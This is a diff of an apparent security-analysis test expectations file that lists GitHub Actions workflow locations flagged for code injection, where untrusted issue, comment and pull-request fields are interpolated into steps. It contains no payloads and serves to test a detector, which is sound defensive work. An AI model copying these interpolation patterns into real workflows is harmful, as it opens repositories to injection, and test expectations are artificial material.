-| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} |
-| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} |
-| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} |
-| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} |
-| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} |
-| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} |
-| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} |
-| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} |
-| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} |
-| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} |
-| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} |
-| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} |
-| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} |
-| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} |
-| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} |
-| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} |
-| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} |
-| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} |
-| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
